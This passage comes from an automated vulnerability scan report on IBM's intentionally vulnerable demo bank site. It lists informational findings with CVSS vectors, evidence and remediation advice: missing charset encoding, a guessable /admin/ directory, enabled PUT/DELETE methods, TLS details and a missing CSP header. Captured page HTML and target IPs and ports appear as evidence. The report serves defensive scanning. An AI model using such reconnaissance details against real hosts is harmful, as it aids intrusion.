premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170"
height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />

<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 754 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

<center><img src="images/home3.jpg" width="170" height="


113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.
<br /><br />
</td>
</tr>
</table>

</td>

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 755 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 756 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
com/software/products/us/en/subcategory/SWI10" >http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.

444 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/feedback.jsp


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

445 HTTP Responses Missing 0.0 Info Pass URL: http://demo.testfire.net/retirement.htm


Character Encoding Port: tcp/80

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 757 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://demo.testfire.net/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 758 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

446 HTTP Responses Missing 0.0 Info Pass URL: http://demo.testfire.net/swagger/index.html


Character Encoding Port: tcp/80

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://demo.testfire.net/swagger/index.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 759 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

447 Discovered Web Directories 0.0 Info Pass URL: https://demo.testfire.net:443/admin/


Port: tcp/443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:443/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

448 SSL Perfect Forward 0.0 Info Pass Port: tcp/443


Secrecy Supported
The server supports Ephemeral Diffie-Hellman ciphers for the SSL/TLS
key exchange phase. Using this algorithm enforces Forward Secrecy for
secure communications with the server.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 760 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Evidence:
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA

Remediation:
No remediation is necessary.

449 SSL-TLS Certificate 0.0 Info Pass Port: tcp/8443


Information
Information extracted from a certificate discovered on a TLS or SSL
wrapped service.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 761 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
Verified: true
Today: 2019-08-05 21:59:57 -0500
Start date: 2018-12-21 02:38:15 UTC
End date: 2019-12-21 03:08:14 UTC
Expired: false
Fingerprint: B0:46:07:6F:F1:C9:1D:08:80:C8:64:5F:53:D8:C9:BE
Subject: /C=CA/ST=Ontario/L=Ottawa/O=IBM/CN=altoromutual.com
Common name: altoromutual.com
Issuer: /C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-
terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust
Certification Authority - L1K
Signature Algorithm: sha256WithRSAEncryption
Version: 2

450 Discovered HTTP Methods 0.0 Info Pass URL: http://demo.testfire.net/swagger/


Port: tcp/80

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 762 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
URL: http://demo.testfire.net/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

451 Service Detected 0.0 Info Pass Port: tcp/8080

This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat, apache:tomcat

Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: http
ip_address: 65.61.137.117
port_number: 8080
transport_protocol: tcp

452 Insecure or no Content- 0.0 Info Pass URL: https://demo.testfire.net/


Security-Policy header Port: tcp/443

Content-Security-Policy (CSP) is a W3C specification offering the


possibility to instruct the client browser from which location and/or
which type of resources are allowed to be loaded. This header can be
useful to prevent Cross-Site Scripting issues present on the site, if used

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 763 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
correctly.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Response: HTTP/1.1 200 OK


Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3;
Path=/; Secure; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:30:23 GMT
Content-Length: 9369

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 764 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 765 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 766 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 767 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 768 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<td valign="top" colspan="3" class="bb">

<!-- Keywords:Altoro Mutual, online banking,


banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />
<br />
<center><img src="images/home1.jpg" width="170" height="
114" /></center>
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 769 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />

<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

<center><img src="images/home3.jpg" width="170"


height="113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.
<br /><br />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 770 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td>
</tr>
</table>

</td>

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 771 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 772 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

453 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/swagger/index.html


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

454 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/subscribe.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

455 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/status_check.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

456 HTTP Responses Missing 0.0 Info Pass URL: https://demo.testfire.net:8443/high_yield_investments.htm


Character Encoding Port: tcp/8443

During the crawl of the HTTP service, we detected HTML and/or XML

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 773 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://demo.testfire.net:8443/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 774 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

457 HTTP Responses Missing 0.0 Info Pass URL: https://demo.testfire.net:8443/swagger/index.html


Character Encoding Port: tcp/8443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://demo.testfire.net:8443/swagger/index.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 775 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

458 Discovered Web Directories 0.0 Info Pass URL: https://65.61.137.117:8443/admin/


Port: tcp/8443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
